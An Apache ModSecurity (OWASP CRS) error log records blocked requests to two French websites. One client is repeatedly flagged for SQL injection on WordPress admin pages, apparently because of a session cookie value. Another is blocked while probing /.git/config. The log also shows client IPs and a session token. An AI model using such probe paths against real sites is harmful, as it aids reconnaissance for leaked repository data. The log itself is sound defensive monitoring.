[Mon May 11 18:35:42.916644 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnPAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:43.469775 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnPAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:43.579677 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFXw-Qm4vhlWBPlMjnPQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:43.579939 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFXw-Qm4vhlWBPlMjnPQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:43.951093 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFXw-Qm4vhlWBPlMjnPQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:45.218477 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFYQ-Qm4vhlWBPlMjnPgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:45.218731 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFYQ-Qm4vhlWBPlMjnPgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:45.818989 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFYQ-Qm4vhlWBPlMjnPgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:46.047490 2026] [security2:error] [pid 1411099:tid 1411116] [client 34.130.34.214:53858] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIFYg-Qm4vhlWBPlMjnQAAAABA"]
[Mon May 11 18:35:46.047709 2026] [security2:error] [pid 1411099:tid 1411116] [client 34.130.34.214:53858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIFYg-Qm4vhlWBPlMjnQAAAABA"]
[Mon May 11 18:35:46.901026 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFYg-Qm4vhlWBPlMjnQgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:46.901340 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFYg-Qm4vhlWBPlMjnQgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:47.520951 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFYg-Qm4vhlWBPlMjnQgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:47.972395 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFYw-Qm4vhlWBPlMjnRAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:47.972675 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFYw-Qm4vhlWBPlMjnRAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:48.574274 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFYw-Qm4vhlWBPlMjnRAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:49.778182 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFZQ-Qm4vhlWBPlMjnRwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:49.778465 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFZQ-Qm4vhlWBPlMjnRwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:50.335282 2026] [security2:error] [pid 1411099:tid 1411116] [client 34.130.34.214:53858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIFYg-Qm4vhlWBPlMjnQAAAABA"]
[Mon May 11 18:35:50.336387 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFZQ-Qm4vhlWBPlMjnRwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:50.466075 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFZg-Qm4vhlWBPlMjnSAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:50.466374 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFZg-Qm4vhlWBPlMjnSAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.016230 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFZg-Qm4vhlWBPlMjnSAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.097146 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFZw-Qm4vhlWBPlMjnSgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.097428 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFZw-Qm4vhlWBPlMjnSgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.482238 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFZw-Qm4vhlWBPlMjnSgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.964576 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFZw-Qm4vhlWBPlMjnTAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:51.964868 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFZw-Qm4vhlWBPlMjnTAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:52.612999 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFZw-Qm4vhlWBPlMjnTAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:53.079845 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFaQ-Qm4vhlWBPlMjnUgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:53.080321 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFaQ-Qm4vhlWBPlMjnUgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:54.367300 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFaQ-Qm4vhlWBPlMjnUgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:54.540120 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFag-Qm4vhlWBPlMjnVQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:54.540419 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFag-Qm4vhlWBPlMjnVQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:55.189082 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFag-Qm4vhlWBPlMjnVQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:55.303777 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.130.34.214:33840] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIFazJnyuKVXoStDhbjeAAAAEk"]
